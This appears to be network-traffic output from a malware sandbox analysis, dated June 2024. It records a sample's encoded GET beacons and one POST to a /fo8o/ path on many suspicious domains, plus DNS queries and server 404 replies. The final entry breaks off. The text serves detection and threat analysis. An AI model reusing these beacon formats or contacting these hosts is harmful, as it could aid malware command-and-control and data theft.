Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=PTl5gU/3CD/Xhg5KDlHojN2VTQtAUK5FTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdnZ60ZUmbyLe/qr8s1uSeQEj8wGRnlWDvMs=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=tDTx8bBUOSgexthKGxTOnUCc0VRR9qJVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOeLTXcC8Q+8Ca4ZDKyYIpPg4REm9D5WLqa0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=CKPof6WmPR8MjyGnH4DbgoSrXD0BQRGHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBUQctCnxeEn1N6dSVAag1SvMAJrrC6MpwI5I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.shenzhoucui.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?aZ=AU3XYvZFaGSlytwpVw8yOp8P3DTmtaA+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBKF09gVMhv/0PQsBNVEJ3Y6D3Cho3zWe+YcQ=&qD=FrMTb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.b301.spaceConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com
Source: global traffic	DNS traffic detected: DNS query: www.b301.space

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 61 5a 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6b 32 76 35 52 35 2f 76 72 4d 41 46 48 55 74 46 78 65 6f 65 77 36 43 2b 6b 42 51 62 2f 41 4c 52 41 3d 3d Data Ascii: aZ=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffk2v5R5/vrMAFHUtFxeoew6C+kBQb/ALRA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 08 Jun 2024 16:14:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:15:00 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:15:03 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:15:05 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:15:08 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 08 Jun 2024 16:15:43 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-06-08T16:15:48.4881186Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 08 Jun 2024 16:15:46 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-06-08T16:15:48.4881186Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 08 Jun 2024 16:15:48 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-06-08T16:15:53.5609652Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 08 Jun 2024 16:15:51 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-06-08T16:15:56.0636698Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:16:19 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:16:21 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 08 Jun 2024 16:16:24 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 